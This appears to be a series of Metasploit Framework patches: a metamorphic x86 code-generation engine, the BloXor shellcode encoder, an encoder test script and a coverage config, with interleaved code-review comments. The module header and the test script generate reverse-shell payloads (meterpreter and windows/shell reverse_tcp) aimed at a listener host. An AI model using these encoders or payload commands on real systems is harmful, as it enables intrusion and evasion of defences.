+ # + def block_previous( target_block ) + previous_block = nil + @blocks.each_key do | current_block | + if( current_block == target_block ) + return previous_block + end + previous_block = current_block + end + return nil + end + + # + # Get the block next to the target block. + # + def block_next( target_block ) + @blocks.each_key do | current_block | + if( block_previous( current_block ) == target_block ) + return current_block + end + end + return nil + end + + # + # Try to generate a solution. + # + def generate + + if( @blocks.has_key?( 'end' ) ) + @blocks.delete( 'end' ) + end + + @blocks['end'] = Block.new( 'end' ) + @blocks['end'] << SymbolicPermutation.new( 'end', self, 1 ) + + # Mix up the permutation orders for each block and create the tree structure. + previous = ::Array.new + @blocks.each_value do | block | + # Shuffle the order of the blocks permutations. + block.shuffle + # create the tree by adding the current blocks permutations as children of the previous block. + current = ::Array.new + block.each do | permutation | + permutation.remove_children + previous.each do | prev | + prev.add_child( permutation ) + end + current << permutation + end + previous = current + end + + # Shuffle the order of the available registers + @reg_available = @reg_available.shuffle + + # We must try every permutation of the register orders, so if we fail to + # generate a solution we rotate the available registers to try again with + # a different order. This ensures we perform and exhaustive search. + 0.upto( @reg_available.length - 1 ) do + + @solution.reset + + # Start from the root node in the solution space and generate a + # solution by traversing the solution space's tree structure. + if( @blocks['begin'].solve ) + # Return the solutions buffer (perform a last pass to fixup all offsets)... 
+ return @solution.buffer + end + + @reg_available.push( @reg_available.shift ) + end + + # :( + nil + end + + # + # An UndefinedPermutation exception is raised when a permutation can't render yet + # as the conditions required are not yet satisfied. + # + class UndefinedPermutation < RuntimeError + def initialize( msg=nil ) + super + end + end + + # + # An UnallowedPermutation exception is raised when a permutation can't ever render + # as the conditions supplied are impossible to satisfy. + # + class UnallowedPermutation < RuntimeError + def initialize( msg=nil ) + super + end + end + + # + # An InvalidPermutation exception is raised when a permutation receives a invalid + # argument and cannot continue to render. This is a fatal exception. + # + class InvalidPermutation < RuntimeError + def initialize( msg=nil ) + super + end + end + + protected + + # + # Overloaded by a subclass to resolve a register number into a suitable register + # name for the target architecture. E.g on x64 the register number 0 with size 64 + # would resolve to RCX. Size is nil by default to indicate we want the default + # machine size, e.g. 32bit DWORD on x86 or 64bit QWORD on x64. + # + def _register_value( regnum, size=nil ) + nil + end + + # + # Perform the actual variable creation. + # + def _create_variable( name, reg=nil ) + regnum = nil + # Sanity check this variable has not already been created. + if( @variables[name] ) + raise RuntimeError, "Variable '#{name}' is already created." + end + # If a fixed register is being assigned to this variable then resolve it + if( reg ) + # Resolve the register name into a register number + @reg_available.each do | num | + if( _register_value( num ) == reg.downcase ) + regnum = num + break + end + end + # If an invalid register name was given or the chosen register is not available we must fail. + if( not regnum ) + raise RuntimeError, "Register '#{reg}' is unknown or unavailable." 
+ end + # Sanity check another variable isnt assigned this register + if( @variables.has_value?( regnum ) ) + raise RuntimeError, "Register number '#{regnum}' is already consumed by variable '#{@variables[name]}'." + end + # Finally we consume the register chosen so we dont select it again later. + @reg_consumed << @reg_available.delete( regnum ) + end + # Create the variable and assign it a register number (or nil if not yet assigned) + @variables[name] = regnum + return name + end + + # + # Create a block which is based on a primitive defined by this machine. + # + def _create_block_primitive( block_name, primitive_name, *args ) + # If this is the first time this block is being created, create the array to hold the permutation list + if( not @blocks[block_name] ) + @blocks[block_name] = Block.new( block_name ) + end + # Now create a new permutation object for every one supplied. + @primitives[primitive_name].each do | source | + @blocks[block_name] << Permutation.new( block_name, primitive_name, self, source, args ) + end + return block_name + end + + # + # Overloaded by a subclass to create any primitives available in this machine. + # + def _create_primitives + nil + end + + # + # Rex::Poly::Machine::Primitive + # + def _create_primitive( name, *permutations ) + # If this is the first time this primitive is being created, create the array to hold the permutation list + if( not @primitives[name] ) + @primitives[name] = ::Array.new + end + # Add in the permutation object (Rex::Poly::Machine::Primitive) for every one supplied. + permutations.each do | permutation | + @primitives[name] << Primitive.new( permutation ) + end + end + + # + # Helper function to generate a number whoes byte representation is valid in this + # machine (does not contain any badchars for example). Optionally we can supply a + # number and the resulting addition/subtraction of this number against the newly + # generated value is also tested for validity. 
This helps in the assembly primitives + # which can use these values. + # + def _make_safe_number( bytes, number=nil ) + format = '' + if( bytes == BYTE ) + format = 'C' + elsif( bytes == WORD ) + format = 'v' + elsif( bytes == DWORD ) + format = 'V' + elsif( bytes == QWORD ) + format = 'Q' + else + raise RuntimeError, "Invalid size '#{bytes}' used in _make_safe_number." + end + + goodchars = (0..255).to_a + + @badchars.unpack( 'C*' ).each do | b | + goodchars.delete( b.chr ) + end + + while( true ) do + value = 0 + + 0.upto( bytes-1 ) do | i | + value |= ( (goodchars[ rand(goodchars.length) ] << i*8) & (0xFF << i*8) ) + end + + if( not is_valid?( [ value ].pack(format) ) or not is_valid?( [ ~value ].pack(format) ) ) + redo + end + + if( not number.nil? ) + if( not is_valid?( [ value + number ].pack(format) ) or not is_valid?( [ value - number ].pack(format) ) ) + redo + end + end + + break + end + + return value + end + + end + + end + +end diff --git a/lib/rex/poly/machine/x86.rb b/lib/rex/poly/machine/x86.rb new file mode 100644 index 0000000000..e72d7aa2d7 --- /dev/null +++ b/lib/rex/poly/machine/x86.rb 
@@ -0,0 +1,508 @@ + +module Rex + + module Poly + + # + # A subclass to represent a Rex poly machine on the x86 architecture. + # + class MachineX86 < Rex::Poly::Machine + + def initialize( badchars='', consume_base_pointer=nil, consume_stack_pointer=true ) + super( badchars, Metasm::Ia32.new ) + + @reg_available << Rex::Arch::X86::EAX + @reg_available << Rex::Arch::X86::EBX + @reg_available << Rex::Arch::X86::ECX + @reg_available << Rex::Arch::X86::EDX + @reg_available << Rex::Arch::X86::ESI + @reg_available << Rex::Arch::X86::EDI + @reg_available << Rex::Arch::X86::EBP + @reg_available << Rex::Arch::X86::ESP + + # By default we consume the EBP register if badchars contains \x00. This helps speed + # things up greatly as many instructions opperating on EBP introduce a NULL byte. For + # example, a MOV instruction with EAX as the source operand is as follows: + # 8B08 mov ecx, [eax] + # but the same instruction with EBP as the source operand is as follows: + # 8B4D00 mov ecx, [ebp] ; This is assembled as 'mov ecx, [ebp+0]' + # we can see that EBP is encoded differently with an offset included. We can still + # try to generate a solution with EBP included and \x00 in the badchars list but + # it can take considerably longer. + if( ( consume_base_pointer.nil? and not Rex::Text.badchar_index( "\x00", @badchars ).nil? ) or consume_base_pointer == true ) + create_variable( 'base_pointer', 'ebp' ) + end + + # By default we consume the ESP register to avoid munging the stack. + if( consume_stack_pointer ) + create_variable( 'stack_pointer', 'esp' ) + end + + # discover all the safe FPU instruction we can use. 
+ @safe_fpu_instructions = ::Array.new + Rex::Arch::X86.fpu_instructions.each do | fpu | + if( is_valid?( fpu ) ) + @safe_fpu_instructions << fpu + end + end + end + + # + # The general purpose registers are 32bit + # + def native_size + Rex::Poly::Machine::DWORD + end + + # + # Overload this method to intercept the 'set' primitive with the 'location' keyword + # and create the block with the '_set_variable_location'. We do this to keep a + # consistent style. + # + def create_block_primitive( block_name, primitive_name, *args ) + if( primitive_name == 'set' and args.length == 2 and args[1] == 'location' ) + _create_block_primitive( block_name, '_set_variable_location', args[0] ) + else + super + end + end + + # + # XXX: If we have a loop primitive, it is a decent speed bump to force the associated variable + # of the first loop primitive to be assigned as ECX (for the x86 LOOP instruction), this is not + # neccasary but can speed generation up significantly. + # + #def generate + # @blocks.each_value do | block | + # if( block.first.primitive == 'loop' ) + # @variables.delete( block.first.args.first ) + # create_variable( block.first.args.first, 'ecx' ) + # break + # end + # end + # # ...go go go + # super + #end + + protected + + # + # Resolve a register number into a suitable register name. + # + def _register_value( regnum, size=nil ) + value = nil + # we default to a native 32 bits if no size is specified. + if( size.nil? ) + size = native_size() + end + + if( size == Rex::Poly::Machine::DWORD ) + value = Rex::Arch::X86::REG_NAMES32[ regnum ] + elsif( size == Rex::Poly::Machine::WORD ) + value = Rex::Arch::X86::REG_NAMES16[ regnum ] + elsif( size == Rex::Poly::Machine::BYTE ) + # (will return nil for ESI,EDI,EBP,ESP) + value = Rex::Arch::X86::REG_NAMES8L[ regnum ] + else + raise RuntimeError, "Register number '#{regnum}' (size #{size.to_i}) is unavailable." + end + return value + end + + # + # Create the x86 primitives. 
+ # + def _create_primitives + + # + # Create the '_set_variable_location' primitive. The first param it the variable to place the current + # blocks location value in. + # + _create_primitive( '_set_variable_location', + ::Proc.new do | block, machine, variable | + if( @safe_fpu_instructions.empty? ) + raise UnallowedPermutation + end + [ + "dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }", + "mov #{machine.variable_value( 'temp' )}, esp", + "fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable | + if( @safe_fpu_instructions.empty? ) + raise UnallowedPermutation + end + [ + "dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }", + "mov #{machine.variable_value( 'temp' )}, esp", + "fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable | + if( @safe_fpu_instructions.empty? ) + raise UnallowedPermutation + end + [ + "dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }", + "push esp", + "pop #{machine.variable_value( 'temp' )}", + "fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable | + if( @safe_fpu_instructions.empty? 
) + raise UnallowedPermutation + end + [ + "dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }", + "fnstenv [ esp - 12 ]", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable | + [ + "call $+5", + "pop #{machine.variable_value( variable )}", + "push #{machine.block_offset( block ) + 5}", + "pop #{machine.variable_value( 'temp' )}", + "sub #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + ] + end, + ::Proc.new do | block, machine, variable | + [ + "db 0xE8, 0xFF, 0xFF, 0xFF, 0xFF, 0xC0", + "pop #{machine.variable_value( variable )}", + "push #{machine.block_offset( block ) + 5}", + "pop #{machine.variable_value( 'temp' )}", + "sub #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + ] + end + ) + + # + # Create the 'loop' primitive. The first param it the counter variable which holds the number of + # times to perform the loop. The second param it the destination block to loop to. + # + _create_primitive( 'loop', + ::Proc.new do | block, machine, counter, destination | + if( machine.variable_value( counter ) != Rex::Arch::X86::REG_NAMES32[ Rex::Arch::X86::ECX ] ) + # we raise and UndefinedPermutation exception to indicate that untill a valid register (ECX) is + # chosen we simply can't render this. This lets the machine know we can still try to use this + # permutation and at a later stage the requirements (counter==ecx) may be satisfied. 
+ raise UndefinedPermutation + end + offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) + Rex::Arch::X86.loop( offset ) + end, + ::Proc.new do | block, machine, counter, destination | + offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) + [ + "dec #{machine.variable_value( counter )}", + "test #{machine.variable_value( counter )}, #{machine.variable_value( counter )}", + # JNZ destination + "db 0x0F, 0x85 dd #{ "0x%08X" % [ offset & 0xFFFFFFFF ] }" + ] + end + ) + + # + # Create the 'xor' primitive. The first param it the variable to xor with the second param value which + # can be either a variable, literal or block offset. + # + _create_primitive( 'xor', + ::Proc.new do | block, machine, variable, value | + [ + "xor #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + # a ^ b == (a | b) & ~(a & b) + [ + "mov #{machine.variable_value( 'temp' )}, #{machine.variable_value( variable )}", + "or #{machine.variable_value( 'temp' )}, #{machine.resolve_value( value )}", + "and #{machine.variable_value( variable )}, #{machine.resolve_value( value )}", + "not #{machine.variable_value( variable )}", + "and #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + ] + end + ) + + # + # Create the 'goto' primitive. The first param is a destination block to jump to. 
+ # + _create_primitive( 'goto', + ::Proc.new do | block, machine, destination | + offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) + if( ( offset > 0 and offset > 127 ) or ( offset < 0 and offset < -127 ) ) + raise UnallowedPermutation + end + [ + # short relative jump + "db 0xEB db #{ "0x%02X" % [ offset & 0xFF ] }" + ] + end, + ::Proc.new do | block, machine, destination | + offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) + [ + # near relative jump + "db 0xE9 dd #{ "0x%08X" % [ offset & 0xFFFFFFFF ] }" + ] + end + ) + + # + # Create the 'add' primitive. The first param it the variable which will be added to the second + # param, which may either be a literal number value, a variables assigned register or a block + # name, in which case the block offset will be used. + # + _create_primitive( 'add', + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + [ + "lea #{machine.variable_value( variable )}, [ #{machine.variable_value( variable )} + #{machine.resolve_value( value )} ]" + ] + end, + ::Proc.new do | block, machine, variable, value | + [ + "push #{machine.resolve_value( value )}", + "add #{machine.variable_value( variable )}, [esp]", + "pop #{machine.variable_value( 'temp' )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + [ + "add #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + [ + "sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFFFFFF ] }" + ] + end + # ::Proc.new do | block, machine, variable, value | + # if( machine.variable_exist?( value ) ) + # raise UnallowedPermutation + # end + # [ + # "push #{ "0x%08X" % [ 
~(machine.resolve_value( value ) - 1) & 0xFFFFFFFF ] }", + # "pop #{machine.variable_value( 'temp' )}", + # "not #{machine.variable_value( 'temp' )}", + # "add #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + # ] + # end, + # ::Proc.new do | block, machine, variable, value | + # if( machine.variable_exist?( value ) ) + # raise UnallowedPermutation + # end + # [ + # "xor #{machine.variable_value( 'temp' )}, #{machine.variable_value( 'temp' )}", + # "mov #{machine.variable_value( 'temp', 16 )}, #{ "0x%04X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFF ] }", + # "not #{machine.variable_value( 'temp', 16 )}", + # "add #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + # ] + # end, + ) + + # + # Create the 'set' primitive. The first param it the variable which will be set. the second + # param is the value to set the variable to (a variable, block or literal). + # + _create_primitive( 'set', + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + [ + "push #{ "0x%08X" % [ ~machine.resolve_value( value ) & 0xFFFFFFFF ] }", + "pop #{machine.variable_value( variable )}", + "not #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + if( machine.resolve_value( value, WORD ) > 0xFFFF ) + raise UndefinedPermutation + end + [ + "xor #{machine.variable_value( variable )}, #{machine.variable_value( variable )}", + "mov #{machine.variable_value( variable, WORD )}, #{ "0x%04X" % [ ~machine.resolve_value( value, WORD ) & 0xFFFF ] }", + "not #{machine.variable_value( variable, WORD )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + [ + "push #{machine.resolve_value( value )}", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + [ + "mov 
#{machine.variable_value( variable )}, #{machine.resolve_value( value )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + if( machine.resolve_value( value, WORD ) > 0xFFFF ) + raise UndefinedPermutation + end + [ + "xor #{machine.variable_value( variable )}, #{machine.variable_value( variable )}", + "mov #{machine.variable_value( variable, WORD )}, #{ "0x%04X" % [ machine.resolve_value( value, WORD ) & 0xFFFF ] }" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + dword = machine.make_safe_dword( machine.resolve_value( value ) ) + [ + "mov #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword ] }", + "sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword - machine.resolve_value( value ) ] }" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + dword = machine.make_safe_dword( machine.resolve_value( value ) ) + [ + "mov #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword - machine.resolve_value( value ) ] }", + "add #{machine.variable_value( variable )}, #{ "0x%08X" % [ ~dword & 0xFFFFFFFF ] }", + "not #{machine.variable_value( variable )}" + ] + end + ) + + # + # Create the 'load' primitive. The first param it the variable which will be set. The second + # param is the value (either a variable or literal) to load from. the third param is the size + # of the load operation, either DWORD, WORD or BYTE. 
+ # + _create_primitive( 'load', + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + result = [ "mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]" ] + elsif( size == Rex::Poly::Machine::WORD ) + result = [ "movzx #{machine.variable_value( variable )}, word [#{machine.resolve_value( value )}]" ] + elsif( size == Rex::Poly::Machine::BYTE ) + result = [ "movzx #{machine.variable_value( variable )}, byte [#{machine.resolve_value( value )}]" ] + else + raise InvalidPermutation + end + result + end, + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + # we raise and UnallowedPermutation here as this permutation should only satisfy requests for + # sizes of WORD or BYTE, any DWORD requests will be satisfied by the above permutation (otherwise + # we would just be duplicating a 'mov dest, [src]' sequence which is the same as above. + raise UnallowedPermutation + elsif( size == Rex::Poly::Machine::WORD ) + result = [ + "mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]", + "shl #{machine.variable_value( variable )}, 16", + "shr #{machine.variable_value( variable )}, 16" + ] + elsif( size == Rex::Poly::Machine::BYTE ) + result = [ + "mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]", + "shl #{machine.variable_value( variable )}, 24", + "shr #{machine.variable_value( variable )}, 24" + ] + else + raise InvalidPermutation + end + result + end, + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + result = [ + "push [#{machine.resolve_value( value )}]", + "pop #{machine.variable_value( variable )}" + ] + elsif( size == Rex::Poly::Machine::WORD ) + result = [ + "push [#{machine.resolve_value( value )}]", + "pop #{machine.variable_value( variable )}", + "shl #{machine.variable_value( variable )}, 16", + 
"shr #{machine.variable_value( variable )}, 16" + ] + elsif( size == Rex::Poly::Machine::BYTE ) + result = [ + "push [#{machine.resolve_value( value )}]", + "pop #{machine.variable_value( variable )}", + "shl #{machine.variable_value( variable )}, 24", + "shr #{machine.variable_value( variable )}, 24" + ] + else + raise InvalidPermutation + end + result + end + ) + + # + # Create the 'store' primitive. + # + _create_primitive( 'store', + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + result = [ "mov [#{machine.variable_value( variable )}], #{machine.resolve_value( value )}" ] + elsif( size == Rex::Poly::Machine::WORD ) + result = [ "mov word [#{machine.variable_value( variable )}], #{machine.resolve_value( value, WORD )}" ] + elsif( size == Rex::Poly::Machine::BYTE ) + if( machine.resolve_value( value, BYTE ).nil? ) + # so long as we cant resolve the variable to an 8bit register value (AL,BL,CL,DL) we must raise + # an UndefinedPermutation exception (this will happen when the variable has been assigned to ESI, + # EDI, EBP or ESP which dont have a low byte representation) + raise UndefinedPermutation + end + result = [ "mov byte [#{machine.variable_value( variable )}], #{machine.resolve_value( value, BYTE )}" ] + else + raise InvalidPermutation + end + result + end, + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + result = [ + "push #{machine.resolve_value( value )}", + "pop [#{machine.variable_value( variable )}]" + ] + elsif( size == Rex::Poly::Machine::WORD ) + result = [ + "push #{machine.resolve_value( value, WORD )}", + "pop word [#{machine.variable_value( variable )}]" + ] + else + # we can never do this permutation for BYTE size (or any other size) + raise UnallowedPermutation + end + result + end + ) + end + + end + + end + +end \ No newline at end of file 
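Review bot: The two `make_safe_dword` permutations of the `'set'` primitive format `dword - machine.resolve_value( value )` with `"0x%08X"` unmasked, whereas every other immediate in this hunk is masked first (`~dword & 0xFFFFFFFF`, `offset & 0xFFFFFFFF`). If the safe dword is ever smaller than the target value Ruby renders the negative difference as `..FFFFFB`-style text, which is not a valid immediate and the permutation fails to assemble; whether `make_safe_dword` guarantees `dword >= value` cannot be seen here since it is defined outside this hunk. Mask both sites: `"sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ (dword - machine.resolve_value( value )) & 0xFFFFFFFF ] }"` and the matching `mov` in the next permutation. Separately, the `db 0xE8, 0xFF, 0xFF, 0xFF, 0xFF, 0xC0` variant of `_set_variable_location` lands the call on its last `0xFF` byte so that `FF C0` executes as `inc eax`, silently modifying EAX; a comment such as `# the call returns into FF C0 (inc eax): EAX must not hold a live variable here` would warn the next reader.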
diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb new file mode 100644 index 0000000000..a2577bc89f --- /dev/null +++ b/modules/encoders/x86/bloxor.rb 
@@ -0,0 +1,58 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'rex/encoder/bloxor/bloxor' + +# +# BloXor is a cross architecture metamorphic block based xor encoder/decoder for Metasploit. +# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb) +# by spoonm and the Rex::Poly::Block (./msf/lib/rex/poly/block.rb) code by skape. +# +# Please refer to ./msf/lib/rex/encoder/bloxor/bloxor.rb for BloXor's implementation and to +# ./msf/lib/rex/poly/machine/machine.rb and ./msf/lib/rex/poly/machine/x86.rb for the +# backend metamorphic stuff. +# +# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a +# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having +# been publicly released for this, so am unable to compare implementations. +# http://census-labs.com/media/packing-heat.pdf +# +# Manually check the output with the following command: +# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 - +# + +class Metasploit3 < Rex::Encoder::BloXor + + # Note: Currently set to manual, bump it up to automatically get selected by the framework. + # Note: BloXor by design is slow due to its exhaustive search for a solution. 
+ Rank = ManualRanking + + def initialize + super( + 'Name' => 'BloXor - A Metamorphic Block Based XOR Encoder', + 'Version' => '$Revision$', + 'Description' => 'A Metamorphic Block Based XOR Encoder.', + 'Author' => [ 'sf' ], + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'EncoderType' => Msf::Encoder::Type::Unspecified + ) + end + + def compute_decoder( state ) + + @machine = Rex::Poly::MachineX86.new( state.badchars ) + + super( state ) + end + +end diff --git a/test/tests/test_encoders.rb b/test/tests/test_encoders.rb new file mode 100644 index 0000000000..d59df128ea --- /dev/null +++ b/test/tests/test_encoders.rb 
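Review bot: `compute_decoder` constructs `Rex::Poly::MachineX86.new( state.badchars )` with the constructor defaults, which (per the x86.rb hunk in this series) reserve ESP unconditionally and EBP whenever `\x00` is a bad character, so the solver may have only six general-purpose registers to allocate; nothing here tells the reader that trade-off was intentional. Suggest a comment above the assignment: `# Constructor defaults reserve ESP (and EBP when \x00 is bad) so the decoder never munges the stack; this shrinks the register pool and lengthens the search.` The rest of the class is declarative metadata and needs no change.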
@@ -0,0 +1,119 @@ +# +# Simple script to test a group of encoders against every exploit in the framework, +# specifically for the exploits badchars, to see if a payload can be encoded. We ignore +# the target arch/platform of the exploit as we just want to pull out real world bad chars. +# + +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib'))) + +require 'fastlib' +require 'msfenv' +require 'msf/base' + +$msf = Msf::Simple::Framework.create + +EXPLOITS = $msf.exploits + +def print_line( message ) + $stdout.puts( message ) +end + +def format_badchars( badchars ) + str = '' + if( badchars ) + badchars.each_byte do | b | + str << "\\x%02X" % [ b ] + end + end + str +end + +def encoder_v_payload( encoder_name, payload, verbose=false ) + success = 0 + fail = 0 + EXPLOITS.each_module do | name, mod | + + exploit = mod.new + print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose + begin + encoder = $msf.encoders.create( encoder_name ) + raw = encoder.encode( payload, exploit.payload_badchars, nil, nil ) + success += 1 + rescue + print_line( " FAILED! 
badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose + fail += 1 + end + end + return [ success, fail ] +end + +def generate_payload( name ) + + payload = $msf.payloads.create( name ) + + # set options for a reverse_tcp payload + payload.datastore['LHOST'] = '192.168.2.1' + payload.datastore['RHOST'] = '192.168.2.254' + payload.datastore['RPORT'] = '5432' + payload.datastore['LPORT'] = '4444' + # set options for an exec payload + payload.datastore['CMD'] = 'calc' + # set generic options + payload.datastore['EXITFUNC'] = 'thread' + + return payload.generate +end + +def run( encoders, payload_name, verbose=false ) + + payload = generate_payload( payload_name ) + + table = Rex::Ui::Text::Table.new( + 'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ), + 'Indent' => 4, + 'Columns' => [ 'Encoder Name', 'Success', 'Fail' ] + ) + + encoders.each do | encoder_name | + + success, fail = encoder_v_payload( encoder_name, payload, verbose ) + + table << [ encoder_name, success, fail ] + + end + + return table +end + +if( $0 == __FILE__ ) + + print_line( "[+] Starting.\n" ) + + encoders = [ + 'x86/bloxor', + 'x86/shikata_ga_nai', + 'x86/jmp_call_additive', + 'x86/fnstenv_mov', + 'x86/countdown', + 'x86/call4_dword_xor' + ] + + payload_name = 'windows/shell/reverse_tcp' + + verbose = false + + result_table = run( encoders, payload_name, verbose ) + + print_line( "\n\n#{result_table.to_s}\n\n" ) + + print_line( "[+] Finished.\n" ) +end + + + + \ No newline at end of file From e2ed4f25eba54174f0f87a9d2dbbe40d2d334504 Mon Sep 17 00:00:00 2001 
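Review bot: In `encoder_v_payload`, `exploit = mod.new` and the `exploit.payload_badchars` call in the verbose print run outside the `begin`/`rescue`, so one exploit module whose constructor or `payload_badchars` raises aborts the entire run instead of being counted; move the instantiation inside the protected region (`begin` / `exploit = mod.new` / `encoder = $msf.encoders.create( encoder_name )` / …). The bare `rescue` also hides why an encode failed; printing `$!.class` and `$!.message` in the verbose branch would make the resulting table actionable. Naming the counter `fail` shadows `Kernel#fail` (an alias of `raise`) — `failed` avoids the confusion — and `raw` is assigned but never read.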
From: Luke Imhoff Date: Fri, 18 Jan 2013 10:02:04 -0600 Subject: [PATCH 004/139] Groups for simplecov report Add Changed group that will show the coverage for any untracked, unstaged, or staged file so developers can more easily see if that their changes are covered. Other groups added for different libraries under lib. --- .simplecov | 50 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 .simplecov diff --git a/.simplecov b/.simplecov new file mode 100644 index 0000000000..d3b12fe6bb --- /dev/null +++ b/.simplecov @@ -0,0 +1,50 @@ +SimpleCov.configure do + # ignore this file + add_filter '.simplecov' + + # + # Changed Files in Git Group + # @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only + # + + untracked = `git ls-files --exclude-standard --others` + unstaged = `git diff --name-only` + staged = `git diff --name-only --cached` + all = untracked + unstaged + staged + changed_filenames = all.split("\n") + + add_group 'Changed' do |source_file| + changed_filenames.detect { |changed_filename| + source_file.filename.end_with?(changed_filename) + } + end + + # + # Framework (msf) related groups + # + + add_group 'Metasploit Framework', 'lib/msf' + add_group 'Metasploit Framework (Base)', 'lib/msf/base' + add_group 'Metasploit Framework (Core)', 'lib/msf/core' + + # + # Other library groups + # + + add_group 'Fastlib', 'lib/fastlib' + add_group 'Metasm', 'lib/metasm' + add_group 'PacketFu', 'lib/packetfu' + add_group 'Rex', 'lib/rex' + add_group 'RKelly', 'lib/rkelly' + add_group 'Ruby Mysql', 'lib/rbmysql' + add_group 'Ruby Postgres', 'lib/postgres' + add_group 'SNMP', 'lib/snmp' + add_group 'Zip', 'lib/zip' + + # + # Specs are reported on to ensure that all examples are being run and all + # lets, befores, afters, etc are being used. + # + + add_group 'Specs', 'spec' +end From 3c2c808457b1dc3a9ea3bc23d1ad463b10d76b5e Mon Sep 17 00:00:00 2001 
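Review bot: The `Changed` group matches files with `source_file.filename.end_with?(changed_filename)`, a suffix test: a change to `lib/msf/core/foo.rb` also tags any other file whose path ends in `core/foo.rb`, and a change to a top-level `foo.rb` tags every `foo.rb` in the tree. Comparing resolved paths is exact — `changed = changed_filenames.map { |f| File.expand_path(f) }` then `changed.include?(File.expand_path(source_file.filename))` — assuming `source_file.filename` is absolute and the process runs from the repository root (`git diff --name-only` prints root-relative paths), neither of which this hunk establishes. The three backtick `git` invocations run at load time in every test process; with fixed arguments there is no injection concern, but if `git` is absent from PATH the backticks raise `Errno::ENOENT` and take the spec run down, and outside a checkout they return empty output plus stderr noise, so wrapping them in `rescue Errno::ENOENT` with an empty fallback is cheap insurance.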
